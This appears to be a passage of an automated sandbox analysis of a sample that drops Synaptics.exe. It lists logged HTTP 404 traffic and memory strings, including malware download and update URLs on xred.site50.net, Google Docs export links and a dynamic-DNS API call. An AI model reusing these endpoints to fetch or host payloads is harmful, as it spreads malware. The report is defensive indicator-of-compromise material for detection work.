                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yipHIJRURjqsV3fqP1rVDuJ_E4E5DWPLypA59nBORL4LA0vBSetivf7zBLfrnWG_UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-guCN7p2yyVA0nTNM9Emksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rpCmOp6GBLlIewz1sOC_4-LHCpJIBC8yDECOdolY20NdmiVshhQitqlaJHteAQ_hYrWP6QPYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JCBlBtjVnkQptvRrDkWd5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5oP4QgKmgYUzZvf-JedWYTvOydVlb-stILsoGAXXeE0e2Uihcbci9OFgYcHHeBNisW4ATfltMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:58 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VR6ahjIG_wg5n4_iPIggVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zKI6lHdmOUVGkvMYX1JFhOAHlFegcAy3EygHYlNcej5U4I5caa-rekDNPjZ0urTxn6iDkSi0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:59 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1XR6IPdPjRdXm-ERuWzgvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6FPKwO6G8kt_HYorVVQuVNDcTN3GhSYGlMiOvDsIsSlOeBV2wem5SkJhheK7Y1SkNSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-rs8ZQ90njOfWcy-JEvCFjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61AdjwDCE993Lec3LWWuh7DTHH5AnsnCy0WiazRtbFAwIaDnmULXSb95YO87J9u8AdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:00 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-EyTL52QY_VYFb6mcynrYLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.000000000057A000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr
                              String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr
                              String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr
                              String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)k
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr
                              String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.1980458813.0000000000591000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2014101336.000000000EA0A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006B05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmp
                              String found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2033802566.000000001A93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2004023076.000000000ACBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2027067816.00000000156BE000.00000004.00000010.00020000.00000000.sdmp
                              String found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr
                              String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp
                              String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2005446316.000000000BF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2016750397.000000001034E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2041380597.000000001F23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2030188729.0000000017C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2022424730.00000000125FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1985804197.00000000063AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2005262500.000000000BCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2042116540.000000001FCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2006095903.000000000C97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2035967388.000000001C0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2044564159.0000000021C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1982293060.00000000042EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2016019447.000000000FA8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1985924258.00000000064EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2007113538.000000000D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2040414387.000000001E5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2006177710.000000000CABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1997373896.0000000006F7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2026479457.0000000014F3E000.00000004.00000010.00020000.00000000.sdmp
                              String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&-
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&7
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&L
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&S
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&c
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&p
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(3
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(C7
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(max-9
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)R7
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)b6
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)g
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)r
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)w
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-U3
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-e2
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-w
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.1
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.N
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.V
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.VD
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cl
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.itb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.q
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000EA3E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/P
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/P=
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0;pad
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0B
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Gp
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0p
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1W
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1f
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1g
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download27
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2L
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2S
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2u
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3R
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3S
